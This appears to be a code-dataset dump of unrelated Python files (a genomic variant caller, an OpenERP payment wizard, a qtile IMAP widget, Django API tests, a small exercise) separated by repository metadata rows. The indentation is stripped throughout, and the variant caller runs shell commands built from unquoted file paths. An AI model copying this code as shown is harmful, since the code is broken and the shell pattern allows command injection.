info = "DP=%s;TYPE=snp" % (coverage)
ref_field = ref_base
alt_field = "N"
vcf_line = "%s\t%s\t.\t%s\t%s\t%d\tPASS\t%s" % (
ref_name,
position,
ref_field,
alt_field,
qual,
info,
)
ret_vcf_list.append(vcf_line)
##################
else:
ret_num_called_bases[0] += 1
ret_coverage_sum[0] += int(coverage)
# TODO: Should I count total coverage of this base, or the non_indel_coverage_current_base?
most_common_base_count = 0
### Handling base consensus.
sorted_base_counts = sorted(
list(base_counts.items()), key=operator.itemgetter(1)
)
try:
most_common_base_count = sorted_base_counts[-1][1]
except Exception as e:
pass
# sys.stderr.write(str(e) + '\n');
# sys.stderr.write('sorted_base_counts:\n');
# sys.stderr.write(str(sorted_base_counts) + '\n');
# sys.stderr.write('base_counts:\n');
# sys.stderr.write(str(base_counts) + '\n');
# sys.stderr.write('original_bases:\n');
# sys.stderr.write(str(original_bases) + '\n');
# sys.stderr.write('line:\n');
# sys.stderr.write(line.strip() + '\n');
# most_common_base_count = 0;
# Allow for the case where there are multiple equally good choices.
# In this case, we prefer the choice which is equal to the reference.
is_good = False
for base_count in sorted_base_counts:
if base_count[1] == most_common_base_count:
if base_count[0] == ref_base:
is_good = True
break
if is_good == False:
if len(sorted_base_counts) > 0:
ret_snp_count[0] += 1
# ret_variant_list.append(line_number);
variant_line = (
"SNP\tpos = %s\tref = %s\tcoverage = %d\tnon_indel_cov_curr = %d\tmost_common_base_count = %d\tref_base = %s\tcons_base = %s\tbase_counts = %s\tinsertion_counts = %s\tdeletion_counts = %s\t%s"
% (
position,
ref_name,
int(coverage),
non_indel_coverage_current_base,
most_common_base_count,
ref_base,
("{}")
if (len(sorted_base_counts) == 0)
else (str(sorted_base_counts[-1][0])),
str(sorted_base_counts),
str(insertion_event_counts),
str(deletion_event_counts),
line.strip(),
)
)
ret_variant_list.append(variant_line)
### VCF output ###
alt_base = (
("{}")
if (len(sorted_base_counts) == 0)
else (str(sorted_base_counts[-1][0]))
)
qual = 1000
info = "DP=%s;TYPE=snp" % (coverage)
ref_field = ref_base
alt_field = alt_base
vcf_line = "%s\t%s\t.\t%s\t%s\t%d\tPASS\t%s" % (
ref_name,
position,
ref_field,
alt_field,
qual,
info,
)
ret_vcf_list.append(vcf_line)
##################
else:
sys.stderr.write(
"\nWarning: a SNP was detected, but there were no bases in the sorted_base_counts!"
)
variant_line = (
"SNP\tpos = %s\tref = %s\tcoverage = %d\tnon_indel_cov_curr = %d\tmost_common_base_count = %d\tref_base = %s\tcons_base = %s\tbase_counts = %s\tinsertion_counts = %s\tdeletion_counts = %s\t%s"
% (
position,
ref_name,
int(coverage),
non_indel_coverage_current_base,
most_common_base_count,
ref_base,
("{}")
if (len(sorted_base_counts) == 0)
else (str(sorted_base_counts[-1][0])),
str(sorted_base_counts),
str(insertion_event_counts),
str(deletion_event_counts),
line.strip(),
)
)
sys.stderr.write("\n")
else:
ret_num_correct_bases[0] += 1
if verbose == True:
sys.stdout.write("Reference base: %s\n" % (ref_base))
sys.stdout.write("Consensus base: %s\n\n" % (base_count[0]))
# if (int(position) == 100000 or int(position) == 1000000 or int(position) == 2000000 or int(position) == 3000000 or int(position) == 4000000):
# print '\nTEST\tpos = %s\tcoverage = %d\tnon_indel_cov_curr = %d\tmost_common_base_count = %d\tref_base = %s\tcons_base = %s\tbase_counts = %s\tinsertion_counts = %s\tdeletion_counts = %s\t%s\n' % (position, int(coverage), non_indel_coverage_current_base, most_common_base_count, ref_base, sorted_base_counts[-1][0], str(sorted_base_counts), str(insertion_event_counts), str(deletion_event_counts), line.strip());
### Handling indel consensus.
### Put a different coverage threshold. Here we are interested even in the reads
### which had a '*' at the current position (because we don't know where it ends).
non_indel_coverage_next_base = (
int(coverage) - end_counts - deletion_count - insertion_count
)
if (
non_indel_coverage_next_base + deletion_count + insertion_count
) > coverage_threshold:
# Sanity check, just to see if there actually were any insertions (to avoid index out of bounds error).
# If there are insertions, get the most common one.
if len(list(insertion_event_counts.keys())) > 0:
sorted_insertion_counts = sorted(
list(insertion_event_counts.items()), key=operator.itemgetter(1)
)
most_common_insertion_count = sorted_insertion_counts[-1][1]
most_common_insertion_length = len(sorted_insertion_counts[-1][0])
insertion_unique = (
True
if (
sum(
[
int(insertion_count[1] == most_common_insertion_count)
for insertion_count in sorted_insertion_counts
]
)
== 1
)
else False
)
else:
most_common_insertion_count = 0
most_common_insertion_length = 0
insertion_unique = False
# Sanity check, just to see if there actually were any deletions (to avoid index out of bounds error).
# If there are deletions, get the most common one.
if len(list(deletion_event_counts.keys())) > 0:
sorted_deletion_counts = sorted(
list(deletion_event_counts.items()), key=operator.itemgetter(1)
)
most_common_deletion_count = sorted_deletion_counts[-1][1]
most_common_deletion_length = len(sorted_deletion_counts[-1][0])
deletion_unique = (
True
if (
sum(
[
int(deletion_count[1] == most_common_deletion_count)
for deletion_count in sorted_deletion_counts
]
)
== 1
)
else False
)
else:
most_common_deletion_count = 0
most_common_deletion_length = 0
deletion_unique = False
if (
most_common_insertion_count > most_common_deletion_count
and most_common_insertion_count > non_indel_coverage_next_base
):
# In this case, insertions are a clear winner.
if insertion_unique == True:
# ret_insertion_count[0] += most_common_insertion_length;
ret_insertion_count[0] += 1
ret_num_called_bases[0] += most_common_insertion_length
# variant_line = 'insertion\t%d\t%s\t%s\t%s\t%s' % (most_common_insertion_count, str(sorted_base_counts), str(insertion_event_counts), str(deletion_event_counts), line.strip());
# ret_variant_list.append(variant_line);
try:
temp_sorted_bc = sorted_base_counts[-1][0]
except:
temp_sorted_bc = 0
indel_length = most_common_insertion_length
variant_line = (
"ins\tpos = %s\tref = %s\tnon_indel_cov_next = %d\tnon_indel_cov_curr = %d\tmost_common_insertion_count = %d\tref_base = %s\tcons_base = %s\tbase_counts = %s\tinsertion_counts = %s\tdeletion_counts = %s\t%s"
% (
position,
ref_name,
non_indel_coverage_next_base,
non_indel_coverage_current_base,
most_common_insertion_count,
ref_base,
temp_sorted_bc,
str(sorted_base_counts),
str(insertion_event_counts),
str(deletion_event_counts),
line.strip(),
)
)
ret_variant_list.append(variant_line)
### Insertions in the VCF format specifies the position where a insertion occurs. The ref position should contain the base which is the same as ref, but the alt field contains the ref base + the insertion event.
### VCF output ###
alt_base = (
("{}")
if (len(sorted_base_counts) == 0)
else (str(sorted_base_counts[-1][0]))
)
qual = 1000
info = "DP=%s;TYPE=ins" % (coverage)
ref_field = ref_base
alt_field = "%s%s" % (ref_base, sorted_insertion_counts[-1][0])
vcf_line = "%s\t%s\t.\t%s\t%s\t%d\tPASS\t%s" % (
ref_name,
position,
ref_field,
alt_field,
qual,
info,
)
ret_vcf_list.append(vcf_line)
##################
elif (
most_common_deletion_count > most_common_insertion_count
and most_common_deletion_count > non_indel_coverage_next_base
):
# In this case, deletions are a clear winner.
if deletion_unique == True:
# ret_deletion_count[0] += most_common_deletion_length;
ret_deletion_count[0] += 1
# variant_line = 'deletion\t%d\t%s\t%s\t%s\t%s' % (most_common_deletion_count, str(sorted_base_counts), str(insertion_event_counts), str(deletion_event_counts), line.strip());
# ret_variant_list.append(variant_line);
# return most_common_deletion_length;
variant_line = (
"del\tpos = %s\tref = %s\tnon_indel_cov_next = %d\tnon_indel_cov_curr = %d\tmost_common_deletion_count = %d\tref_base = %s\tcons_base = %s\tbase_counts = %s\tinsertion_counts = %s\tdeletion_counts = %s\t%s"
% (
position,
ref_name,
non_indel_coverage_next_base,
non_indel_coverage_current_base,
most_common_deletion_count,
ref_base,
sorted_base_counts[-1][0],
str(sorted_base_counts),
str(insertion_event_counts),
str(deletion_event_counts),
line.strip(),
)
)
ret_variant_list.append(variant_line)
### Deletions in the VCF format specifies the position where a deletion occurs, with the first base being non-deletion, and the following bases being a deletion event.
### VCF output ###
alt_base = (
("{}")
if (len(sorted_base_counts) == 0)
else (str(sorted_base_counts[-1][0]))
)
qual = 1000
info = "DP=%s;TYPE=del" % (coverage)
ref_field = "%s%s" % (ref_base, sorted_deletion_counts[-1][0])
alt_field = ref_base
vcf_line = "%s\t%s\t.\t%s\t%s\t%d\tPASS\t%s" % (
ref_name,
position,
ref_field,
alt_field,
qual,
info,
)
ret_vcf_list.append(vcf_line)
##################
return most_common_deletion_length
else:
# In this case, either the base count consensus wins, or the
# insertion/deletion count is ambiguous.
pass
return 0
def process_mpileup(
alignments_path,
reference_path,
mpileup_path,
coverage_threshold,
output_prefix,
thread_id=0,
bed_position="",
):
fp = None
try:
fp = open(mpileup_path, "r")
except IOError:
sys.stderr.write(
'ERROR: Could not open file "%s" for reading!\n' % mpileup_path
)
return None
ret_variant_list = []
ret_vcf_list = []
ret_snp_count = [0]
ret_insertion_count = [0]
ret_deletion_count = [0]
ret_num_undercovered_bases = [0]
ret_num_called_bases = [0]
ret_num_correct_bases = [0]
ret_coverage_sum = [0]
# lines = fp.readlines();
fp_variant = None
fp_vcf = None
if output_prefix != "":
if not os.path.exists(os.path.dirname(output_prefix)):
os.makedirs(os.path.dirname(output_prefix))
variant_file = "%s-cov_%d.variant.csv" % (output_prefix, coverage_threshold)
fp_variant = open(variant_file, "w")
vcf_file = "%s-cov_%d.variant.vcf" % (output_prefix, coverage_threshold)
fp_vcf = open(vcf_file, "w")
fp_vcf.write("##fileformat=VCFv4.0\n")
fp_vcf.write("##fileDate=20150409\n")
fp_vcf.write("##source=%s\n" % (" ".join(sys.argv)))
fp_vcf.write("##reference=%s\n" % reference_path)
fp_vcf.write('##INFO=<ID=DP,Number=1,Type=Integer,Description="Raw Depth">\n')
fp_vcf.write(
'##INFO=<ID=TYPE,Number=A,Type=String,Description="Type of each allele (snp, ins, del, mnp, complex)">\n'
)
fp_vcf.write(
'##INFO=<ID=AF,Number=1,Type=Float,Description="Allele Frequency">\n'
)
fp_vcf.write(
'##INFO=<ID=SB,Number=1,Type=Integer,Description="Phred-scaled strand bias at this position">\n'
)
fp_vcf.write(
'##INFO=<ID=DP4,Number=4,Type=Integer,Description="Counts for ref-forward bases, ref-reverse, alt-forward and alt-reverse bases">\n'
)
fp_vcf.write(
'##INFO=<ID=INDEL,Number=0,Type=Flag,Description="Indicates that the variant is an INDEL.">\n'
)
fp_vcf.write(
'##INFO=<ID=CONSVAR,Number=0,Type=Flag,Description="Indicates that the variant is a consensus variant (as opposed to a low frequency variant).">\n'
)
fp_vcf.write(
'##INFO=<ID=HRUN,Number=1,Type=Integer,Description="Homopolymer length to the right of report indel position">\n'
)
fp_vcf.write("#CHROM\tPOS\tID\tREF\tALT\tQUAL\tFILTER\tINFO\n")
fp_vcf.flush()
use_bed = False
bed_chromosome = ""
bed_pos_start = 0
# bed_pos_end = len(lines);
bed_pos_end = -1
if bed_position != "":
bed_split = bed_position.split(":")
if len(bed_split) != 2:
use_bed = False
else:
bed_chromosome = bed_split[0]
bed_pos_split = bed_split[1].split("-")
if len(bed_pos_split) != 2:
use_bed = False
else:
bed_pos_start = int(bed_pos_split[0])
bed_pos_end = int(bed_pos_split[1])
use_bed = True
sys.stderr.write("Using location specified through commandline:\n")
sys.stderr.write('\tChromosome: "%s"\n' % bed_chromosome)
sys.stderr.write("\tStart: %d\n" % bed_pos_start)
sys.stderr.write("\tEnd: %d\n\n" % bed_pos_end)
# i = 0;
i = 0 if (use_bed == False) else max((bed_pos_start - 10), 0)
j = 0
# while (i < bed_pos_end): # len(lines)):
num_bases_to_skip = 0
for line in fp:
# line = lines[i];
if num_bases_to_skip > 0:
num_bases_to_skip -= 1
continue
if use_bed == True:
line_split = line.strip().split("\t")
if len(line_split) > 2 and line_split[0] == bed_chromosome:
current_pos = int(line_split[1])
if current_pos < bed_pos_start or current_pos >= bed_pos_end:
i += 1
j += 1
continue
else:
# print line_split[0];
# print bed_chromosome;
i += 1
j += 1
continue
if thread_id == 0:
if (j % 1000) == 0:
sys.stderr.write(
"\r[%d] snps = %d, insertions = %d, deletions = %d, undercovered = %d, coverage = %.2f"
% (
i,
ret_snp_count[0],
ret_insertion_count[0],
ret_deletion_count[0],
ret_num_undercovered_bases[0],
(float(ret_coverage_sum[0]) / float((i + 1))),
)
)
sys.stderr.flush()
variant_list_length = len(ret_variant_list)
vcf_list_length = len(ret_vcf_list)
num_bases_to_skip = process_mpileup_line(
line,
i,
ret_variant_list,
ret_vcf_list,
ret_snp_count,
ret_insertion_count,
ret_deletion_count,
ret_num_undercovered_bases,
ret_num_called_bases,
ret_num_correct_bases,
ret_coverage_sum,
coverage_threshold,
verbose=use_bed,
)
if len(ret_variant_list) > variant_list_length and fp_variant != None:
fp_variant.write("\n".join(ret_variant_list[variant_list_length:]) + "\n")
fp_variant.flush()
if len(ret_vcf_list) > vcf_list_length and fp_vcf != None:
fp_vcf.write("\n".join(ret_vcf_list[vcf_list_length:]) + "\n")
fp_vcf.flush()
i += num_bases_to_skip
i += 1
j += 1
# if (i > 10000):
# break;
fp.close()
sys.stderr.write("\n")
if fp_variant != None:
fp_variant.close()
if fp_vcf != None:
fp_vcf.close()
summary_lines = ""
summary_lines += "alignments_file: %s\n" % alignments_path
summary_lines += "mpileup_file: %s\n" % mpileup_path
summary_lines += "coverage_threshold: %d\n" % coverage_threshold
summary_lines += "snp_count: %d\n" % ret_snp_count[0]
summary_lines += "insertion_count: %d\n" % ret_insertion_count[0]
summary_lines += "deletion_count: %d\n" % ret_deletion_count[0]
summary_lines += "num_undercovered_bases: %d\n" % ret_num_undercovered_bases[0]
summary_lines += "num_called_bases: %d\n" % ret_num_called_bases[0]
summary_lines += "num_correct_bases: %d\n" % ret_num_correct_bases[0]
summary_lines += "average_coverage: %.2f\n" % (
(float(ret_coverage_sum[0]) / float((i + 1)))
)
sys.stderr.write(summary_lines + "\n")
sys.stderr.write("\n")
if output_prefix != "":
# summary_file = output_prefix + '.conssum';
summary_file = "%s-cov_%d.variant.sum" % (output_prefix, coverage_threshold)
try:
fp_sum = open(summary_file, "w")
fp_sum.write(summary_lines)
fp_sum.close()
return summary_file
except IOError:
sys.stderr.write(
'ERROR: Could not open file "%s" for writing!\n' % (summary_file)
)
return None
return None
def main(
alignments_path,
reference_path,
coverage_threshold,
output_prefix,
thread_id=0,
bed_position="",
):
# Sanity checking the existence of the file, and the correctness of its extension.
# Also, if input file is a SAM file, then convert it to a sorted BAM.
alignments_path_bam = alignments_path
if os.path.exists(alignments_path) == False:
sys.stderr.write('ERROR: File "%s" does not exist!\n' % alignments_path)
return
if alignments_path.endswith("sam"):
# Determine the path where the new BAM file will be generated.
dir_name = os.path.dirname(alignments_path)
if dir_name == "":
dir_name = "."
alignments_path_bam = (
dir_name
+ "/"
+ os.path.splitext(os.path.basename(alignments_path))[0]
+ ".bam"
)
alignments_path_bam_exists = os.path.exists(alignments_path_bam)
# Check if a BAM file with the given name already exists.
if alignments_path_bam_exists == False or (
alignments_path_bam_exists == True
and os.path.getmtime(alignments_path)
> os.path.getmtime(alignments_path_bam)
):
# Convert the SAM file to a sorted BAM file.
command = "samtools view -bS %s | samtools sort - %s" % (
alignments_path,
os.path.splitext(alignments_path_bam)[0],
)
sys.stderr.write(command + "\n")
subprocess.call(command, shell="True")
# Create the BAM index file.
command = "samtools index %s %s.bai" % (
alignments_path_bam,
alignments_path_bam,
)
subprocess.call(command, shell="True")
elif alignments_path.endswith("bam") == False:
sys.stderr.write(
'ERROR: File extension needs to be either .sam or .bam! Input file path: "%s".\n'
% alignments_path
)
return
# Convert the sorted BAM file to a mpileup file if it doesn't exist yet.
mpileup_path = "%s.mpileup" % alignments_path_bam
mpileup_exists = os.path.exists(mpileup_path)
if mpileup_exists == False or (
mpileup_exists == True
and os.path.getmtime(alignments_path) > os.path.getmtime(mpileup_path)
):
command = "samtools mpileup -B -d 1000000 -Q 0 -A -f %s %s > %s.mpileup" % (
reference_path,
alignments_path_bam,
alignments_path_bam,
)
subprocess.call(command, shell="True")
sys.stderr.write('Processing file "%s"...\n' % alignments_path)
sys.stderr.write('Reference file "%s"...\n' % reference_path)
sys.stderr.write("Coverage threshold: %d\n" % coverage_threshold)
summary_file = process_mpileup(
alignments_path,
reference_path,
("%s.mpileup" % alignments_path_bam),
coverage_threshold,
output_prefix,
thread_id,
bed_position,
)
def CollectSummaries(
sam_files, prefix_for_intermediate_results, collective_output_file
):
fp_collect = None
try:
fp_collect = open(collective_output_file, "w")
except IOError:
sys.stderr.write(
'ERROR: Could not open file "%s" for writing!\n' % collective_output_file
)
return
for sam_file in sam_files:
summary_file = prefix_for_intermediate_results + ".sum"
try:
fp_sum = open(summary_file, "r")
lines = fp_sum.readlines()
fp_sum.close()
except IOError:
sys.stderr.write(
'ERROR: Could not open file "%s" for reading!\n' % summary_file
)
continue
fp_collect.write("".join(lines) + "\n")
fp_collect.close()
if __name__ == "__main__":
# if (len(sys.argv) < 5):
# sys.stderr.write('Usage:\n');
# sys.stderr.write('\t%s <reference_file_path> coverage_threshold <collective_output_file> <{sb}am_file_1> [<{sb}am_file_2> <{sb}am_file_3> ...]\n' % sys.argv[0]);
# sys.stderr.write('\t(If <collective_output_file> is equal to "-", no files will be written to disk.)\n');
# exit(1);
if len(sys.argv) < 5:
sys.stderr.write("Usage:\n")
sys.stderr.write(
"\t%s <reference_file_path> coverage_threshold <output_prefix> <{sb}am_file_> [position]\n"
% sys.argv[0]
)
sys.stderr.write(
'\t(If <collective_output_file> is equal to "-", no files will be written to disk.)\n'
)
sys.stderr.write(
'\tPosition parameter is a string specifying "chromosome:start-end"\n\n'
)
exit(1)
reference_file = sys.argv[1]
coverage_threshold = int(sys.argv[2])
output_prefix = sys.argv[3]
sam_file = sys.argv[4]
bed_position = ""
if len(sys.argv) > 5:
bed_position = sys.argv[5]
# sys.stderr.write('bed_position: "%s"\n\n' % bed_position);
processes = []
if output_prefix == "-":
output_prefix = os.path.splitext(sam_file)[0]
main(sam_file, reference_file, coverage_threshold, output_prefix, 0, bed_position)
# if (output_prefix != '-'):
# CollectSummaries([sam_file], output_prefix, output_prefix + '.variant.sum');
| 39.755924 | 436 | 0.550933 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11,251 | 0.33531 |
6a049ff78a91de998072b637d1639d25a433a194 | 5,867 | py | Python | web/addons/account_payment/wizard/account_payment_populate_statement.py | diogocs1/comps | 63df07f6cf21c41e4527c06e2d0499f23f4322e7 | [
"Apache-2.0"
] | null | null | null | web/addons/account_payment/wizard/account_payment_populate_statement.py | diogocs1/comps | 63df07f6cf21c41e4527c06e2d0499f23f4322e7 | [
"Apache-2.0"
] | null | null | null | web/addons/account_payment/wizard/account_payment_populate_statement.py | diogocs1/comps | 63df07f6cf21c41e4527c06e2d0499f23f4322e7 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from lxml import etree
from openerp.osv import fields, osv
class account_payment_populate_statement(osv.osv_memory):
_name = "account.payment.populate.statement"
_description = "Account Payment Populate Statement"
_columns = {
'lines': fields.many2many('payment.line', 'payment_line_rel_', 'payment_id', 'line_id', 'Payment Lines')
}
def fields_view_get(self, cr, uid, view_id=None, view_type='form', context=None, toolbar=False, submenu=False):
line_obj = self.pool.get('payment.line')
res = super(account_payment_populate_statement, self).fields_view_get(cr, uid, view_id=view_id, view_type=view_type, context=context, toolbar=toolbar, submenu=False)
line_ids = line_obj.search(cr, uid, [
('move_line_id.reconcile_id', '=', False),
('bank_statement_line_id', '=', False),
('move_line_id.state','=','valid')])
line_ids.extend(line_obj.search(cr, uid, [
('move_line_id.reconcile_id', '=', False),
('order_id.mode', '=', False),
('move_line_id.state','=','valid')]))
domain = '[("id", "in", '+ str(line_ids)+')]'
doc = etree.XML(res['arch'])
nodes = doc.xpath("//field[@name='lines']")
for node in nodes:
node.set('domain', domain)
res['arch'] = etree.tostring(doc)
return res
def populate_statement(self, cr, uid, ids, context=None):
line_obj = self.pool.get('payment.line')
statement_obj = self.pool.get('account.bank.statement')
statement_line_obj = self.pool.get('account.bank.statement.line')
currency_obj = self.pool.get('res.currency')
voucher_obj = self.pool.get('account.voucher')
voucher_line_obj = self.pool.get('account.voucher.line')
move_line_obj = self.pool.get('account.move.line')
if context is None:
context = {}
data = self.read(cr, uid, ids, context=context)[0]
line_ids = data['lines']
if not line_ids:
return {'type': 'ir.actions.act_window_close'}
statement = statement_obj.browse(cr, uid, context['active_id'], context=context)
for line in line_obj.browse(cr, uid, line_ids, context=context):
ctx = context.copy()
ctx['date'] = line.ml_maturity_date # was value_date earlier,but this field exists no more now
amount = currency_obj.compute(cr, uid, line.currency.id,
statement.currency.id, line.amount_currency, context=ctx)
if not line.move_line_id.id:
continue
context = dict(context, move_line_ids=[line.move_line_id.id])
result = voucher_obj.onchange_partner_id(cr, uid, [], partner_id=line.partner_id.id, journal_id=statement.journal_id.id, amount=abs(amount), currency_id= statement.currency.id, ttype='payment', date=line.ml_maturity_date, context=context)
if line.move_line_id:
voucher_res = {
'type': 'payment',
'name': line.name,
'partner_id': line.partner_id.id,
'journal_id': statement.journal_id.id,
'account_id': result['value'].get('account_id', statement.journal_id.default_credit_account_id.id),
'company_id': statement.company_id.id,
'currency_id': statement.currency.id,
'date': line.date or time.strftime('%Y-%m-%d'),
'amount': abs(amount),
'period_id': statement.period_id.id,
}
voucher_id = voucher_obj.create(cr, uid, voucher_res, context=context)
voucher_line_dict = {}
for line_dict in result['value']['line_cr_ids'] + result['value']['line_dr_ids']:
move_line = move_line_obj.browse(cr, uid, line_dict['move_line_id'], context)
if line.move_line_id.move_id.id == move_line.move_id.id:
voucher_line_dict = line_dict
if voucher_line_dict:
voucher_line_dict.update({'voucher_id': voucher_id})
voucher_line_obj.create(cr, uid, voucher_line_dict, context=context)
st_line_id = statement_line_obj.create(cr, uid, {
'name': line.order_id.reference or '?',
'amount': - amount,
'partner_id': line.partner_id.id,
'statement_id': statement.id,
'ref': line.communication,
}, context=context)
line_obj.write(cr, uid, [line.id], {'bank_statement_line_id': st_line_id})
return {'type': 'ir.actions.act_window_close'}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| 48.891667 | 250 | 0.592466 | 4,746 | 0.808931 | 0 | 0 | 0 | 0 | 0 | 0 | 1,994 | 0.339867 |
6a04d1fd425aed6effcc3e48e1eb103f0872ab5a | 3,621 | py | Python | libqtile/widget/imapwidget.py | akloster/qtile | bd21d0744e177b8ca01ac129081472577d53ed66 | [
"MIT"
] | 1 | 2021-04-05T07:15:37.000Z | 2021-04-05T07:15:37.000Z | libqtile/widget/imapwidget.py | akloster/qtile | bd21d0744e177b8ca01ac129081472577d53ed66 | [
"MIT"
] | 1 | 2022-02-27T12:17:27.000Z | 2022-02-27T12:17:27.000Z | libqtile/widget/imapwidget.py | akloster/qtile | bd21d0744e177b8ca01ac129081472577d53ed66 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright (c) 2015 David R. Andersen
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import imaplib
import re
import keyring
from libqtile.log_utils import logger
from libqtile.widget import base
class ImapWidget(base.ThreadPoolText):
"""Email IMAP widget
This widget will scan one of your imap email boxes and report the number of
unseen messages present. I've configured it to only work with imap with
ssl. Your password is obtained from the Gnome Keyring.
Writing your password to the keyring initially is as simple as (changing
out <userid> and <password> for your userid and password):
1) create the file ~/.local/share/python_keyring/keyringrc.cfg with the
following contents::
[backend]
default-keyring=keyring.backends.Gnome.Keyring
keyring-path=/home/<userid>/.local/share/keyring/
2) Execute the following python shell script once::
#!/usr/bin/env python3
import keyring
user = <userid>
password = <password>
keyring.set_password('imapwidget', user, password)
mbox names must include the path to the mbox (except for the default
INBOX). So, for example if your mailroot is ``~/Maildir``, and you want to
look at the mailbox at HomeMail/fred, the mbox setting would be:
``mbox="~/Maildir/HomeMail/fred"``. Note the nested sets of quotes! Labels
can be whatever you choose, of course.
Widget requirements: keyring_.
.. _keyring: https://pypi.org/project/keyring/
"""
defaults = [
('mbox', '"INBOX"', 'mailbox to fetch'),
('label', 'INBOX', 'label for display'),
('user', None, 'email username'),
('server', None, 'email server name'),
]
def __init__(self, **config):
base.ThreadPoolText.__init__(self, "", **config)
self.add_defaults(ImapWidget.defaults)
password = keyring.get_password('imapwidget', self.user)
if password is not None:
self.password = password
else:
logger.critical('Gnome Keyring Error')
def poll(self):
im = imaplib.IMAP4_SSL(self.server, 993)
if self.password == 'Gnome Keyring Error':
self.text = 'Gnome Keyring Error'
else:
im.login(self.user, self.password)
status, response = im.status(self.mbox, '(UNSEEN)')
self.text = response[0].decode()
self.text = self.label + ': ' + re.sub(r'\).*$', '', re.sub(r'^.*N\s', '', self.text))
im.logout()
return self.text
| 38.521277 | 98 | 0.67219 | 2,384 | 0.658382 | 0 | 0 | 0 | 0 | 0 | 0 | 2,634 | 0.727423 |
6a04e4f203740a253735948c968506f6632354e6 | 2,486 | py | Python | game/views/tests/game_definition_view_test.py | dimadk24/english-fight-api | 506a3eb2cb4cb91203b1e023b5248c27975df075 | [
"MIT"
] | null | null | null | game/views/tests/game_definition_view_test.py | dimadk24/english-fight-api | 506a3eb2cb4cb91203b1e023b5248c27975df075 | [
"MIT"
] | null | null | null | game/views/tests/game_definition_view_test.py | dimadk24/english-fight-api | 506a3eb2cb4cb91203b1e023b5248c27975df075 | [
"MIT"
] | null | null | null | from rest_framework.response import Response
from rest_framework.test import APIClient
from game.models import GameDefinition, AppUser
def create_game_definition(api_client: APIClient) -> Response:
return api_client.post("/api/game_definition")
def get_game_definition(api_client: APIClient, game_def_id: str) -> Response:
return api_client.get(f"/api/game_definition/{game_def_id}")
def test_returns_game_def_to_the_current_user_by_hash_id(api_client):
post_game_def_response = create_game_definition(api_client)
assert post_game_def_response.status_code == 201
game_def_id = post_game_def_response.data["id"]
assert isinstance(game_def_id, str)
get_game_def_response = get_game_definition(api_client, game_def_id)
assert get_game_def_response.status_code == 200
assert get_game_def_response.data == post_game_def_response.data
def test_returns_game_def_to_another_user_by_hash_id(api_client):
post_game_def_response = create_game_definition(api_client)
assert post_game_def_response.status_code == 201
game_def_id = post_game_def_response.data["id"]
assert isinstance(game_def_id, str)
user2 = AppUser.objects.create(vk_id=2, username=2)
api_client.force_authenticate(user2)
get_game_def_response = get_game_definition(api_client, game_def_id)
assert get_game_def_response.status_code == 200
assert get_game_def_response.data == post_game_def_response.data
def test_game_def_not_found_by_int_id(api_client):
post_game_def_response = create_game_definition(api_client)
assert post_game_def_response.status_code == 201
game_def_id = post_game_def_response.data["id"]
int_game_def_id = GameDefinition.objects.get(pk=game_def_id).id.id
assert isinstance(int_game_def_id, int)
get_game_def_response = get_game_definition(
api_client, str(int_game_def_id)
)
assert get_game_def_response.status_code == 404
assert get_game_def_response.data == {"detail": "Страница не найдена."}
def test_game_def_permission_denied_if_started(api_client):
post_game_def_response = create_game_definition(api_client)
game_def_id = post_game_def_response.data["id"]
GameDefinition.objects.filter(id=game_def_id).update(started=True)
get_game_def_response = get_game_definition(api_client, game_def_id)
assert get_game_def_response.status_code == 403
assert get_game_def_response.data == {
'detail': 'К игре уже нельзя подключиться'
}
| 35.514286 | 77 | 0.79284 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 188 | 0.074338 |
6a051324d6c23235da009880d6bcb0d30ed4d8dc | 315 | py | Python | 2-Python-Fundamentals (Jan 2021)/Course-Exercises-and-Exams/08-Text-Processing/01_Lab/02-Repeat-Strings.py | karolinanikolova/SoftUni-Software-Engineering | 7891924956598b11a1e30e2c220457c85c40f064 | [
"MIT"
] | null | null | null | 2-Python-Fundamentals (Jan 2021)/Course-Exercises-and-Exams/08-Text-Processing/01_Lab/02-Repeat-Strings.py | karolinanikolova/SoftUni-Software-Engineering | 7891924956598b11a1e30e2c220457c85c40f064 | [
"MIT"
] | null | null | null | 2-Python-Fundamentals (Jan 2021)/Course-Exercises-and-Exams/08-Text-Processing/01_Lab/02-Repeat-Strings.py | karolinanikolova/SoftUni-Software-Engineering | 7891924956598b11a1e30e2c220457c85c40f064 | [
"MIT"
] | null | null | null | # 2. Repeat Strings
# Write a Program That Reads a list of strings. Each string is repeated N times, where N is the length of the string. Print the concatenated string.
strings = input().split()
output_string = ""
for string in strings:
N = len(string)
output_string += string * N
print(output_string)
| 22.5 | 148 | 0.71746 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 169 | 0.536508 |
